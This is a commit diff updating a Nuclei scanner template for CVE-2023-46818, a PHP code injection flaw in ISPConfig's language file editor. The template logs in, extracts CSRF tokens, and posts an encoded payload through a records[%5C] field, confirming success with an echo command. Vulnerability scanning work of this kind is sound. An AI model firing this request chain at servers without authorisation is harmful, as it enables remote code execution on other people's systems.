Update CVE-2023-46818.yaml

2024-08-25 05:48:55 +04:00 · 2024-08-25 05:48:55 +04:00 · 218fcc58b6
parent 44930ee3aa
commit 218fcc58b6
1 changed files with 28 additions and 20 deletions
--- a/http/cves/2023/CVE-2023-46818.yaml
+++ b/http/cves/2023/CVE-2023-46818.yaml
@ -1,28 +1,26 @@
 id: CVE-2023-46818

 info:
-  name: ISPConfig PHP Code Injection if allow_admin_langedit is enabled
+  name: ISPConfig - PHP Code Injection
  author: non-things
  severity: high
  description: |
    An issue was discovered in ISPConfig before 3.2.11p1. PHP code injection can be achieved in the language file editor by an admin if admin_allow_langedit is enabled.
  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-46818
    - https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/
    - http://packetstormsecurity.com/files/176126/ISPConfig-3.2.11-PHP-Code-Injection.html
    - http://seclists.org/fulldisclosure/2023/Dec/2
-
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-46818
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2023-46818
    cwe-id: CWE-94
-
  metadata:
    verified: true
    max-requests: 1
    product: ispconfig
-  tags: ispconfig,rce
+  tags: cve,cve2023,ispconfig,php,rce

 variables:
  lang-file: "{{rand_text_alpha(26)}}.lng"
@ -35,6 +33,21 @@ variables:
  echo-cmd: "echo {{echo-cmd-hash}}"

 http:
+  - raw:
+      - |
+        POST /login/index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}&s_mod=login
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(header, "Set-Cookie")'
+          - 'status_code == 302'
+        condition: and
+
  - raw:
      - |
        POST /admin/language_edit.php HTTP/1.1
@ -44,39 +57,34 @@ http:

        lang=en&module=help&lang_file={{lang-file}}

-    matchers-condition: and
    matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        words:
-          - "_csrf_id"
-          - "_csrf_key"
+      - type: dsl
+        dsl:
+          - 'contains_all(response, "_csrf_id", "_csrf_key")'
+          - 'status_code == 200'
        condition: and

    extractors:
      - type: regex
        name: lang_file_location
-        internal: true
        group: 1
        regex:
          - "<legend>Language file: (.*)</legend>"
+        internal: true

      - type: regex
        name: csrf_id
-        internal: true
        group: 1
        regex:
          - "_csrf_id\" value=\"(.*)\" />"
+        internal: true

      - type: regex
        name: csrf_key
-        internal: true
        group: 1
        regex:
          - "_csrf_key\" value=\"(.*)\" />"
+        internal: true

  - raw:
      - |
@ -87,9 +95,9 @@ http:
        lang=en&module=help&lang_file={{lang-file}}&_csrf_id={{csrf_id}}&_csrf_key={{csrf_key}}&records[%5C]={{payload-url-enc}}

    matchers:
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
 
  - raw:
      - |